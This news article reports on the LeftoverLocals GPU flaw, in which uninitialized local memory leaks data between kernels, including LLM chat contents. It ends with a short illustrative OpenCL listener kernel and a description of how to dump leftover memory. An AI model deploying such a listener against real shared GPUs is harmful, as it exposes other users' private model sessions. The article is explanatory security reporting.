Researchers at security firm Trail of Bits have uncovered a vulnerability, dubbed LeftoverLocals, in the graphics processing units (GPUs) of Apple, AMD, and Qualcomm devices. The flaw stems from the affected GPUs' failure to isolate local memory between kernel launches: data written by one GPU program can remain in local memory and be read by the next program to run. An attacker who can run GPU kernel code on the same machine can therefore dump leftover data from memory, including the contents of large language model (LLM) sessions.

To demonstrate the attack, the researchers ran the open-source LLM framework llama.cpp on a target device and wrote listener kernels in OpenCL. They recovered roughly 181 megabytes of leftover data per LLM query and reproduced chat sessions, gaining access to model parameters and outputs. They warn that implementing these attacks is within reach of amateur programmers, and that open-source language models, whose internals are publicly known, are particularly exposed to this type of exploit.

Apple has released limited patches for the flaw, while Qualcomm and AMD are still evaluating the vulnerability. The discovery aligns with an alert from the U.S. National Institute of Standards and Technology (NIST) warning of cyber threats to AI models through prompt injection and data-leak vulnerabilities. NIST notes that protecting AI from such misdirection remains difficult, given the complexity of the software environment and the large datasets used to train AI models.
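The dump described above exploits the fact that, on affected GPUs, local memory is not zeroed between kernel launches. A minimal sketch of what such a "listener" kernel might look like in OpenCL C follows; the kernel name, the LM_SIZE constant, and the indexing scheme are illustrative assumptions, not Trail of Bits' actual proof-of-concept code:

```
/* Hypothetical LeftoverLocals-style listener kernel (sketch).
 * LM_SIZE is an assumed size for the local-memory scratch region. */
#define LM_SIZE 4096

__kernel void listener(__global volatile int *dump) {
    /* Declare a local-memory array but never initialize it: on a
     * vulnerable GPU it still holds whatever the previously executed
     * kernel (e.g., a victim's LLM inference pass) left behind. */
    __local volatile int lm[LM_SIZE];

    /* Copy the leftover local memory out to a global buffer that the
     * host program can read back and scan for another process's data. */
    for (uint i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
        dump[get_group_id(0) * LM_SIZE + i] = lm[i];
    }
}
```

A host program would launch such a kernel repeatedly alongside the victim's GPU workload and inspect the dump buffer for recognizable fragments, which is how leftover LLM session data could be reassembled.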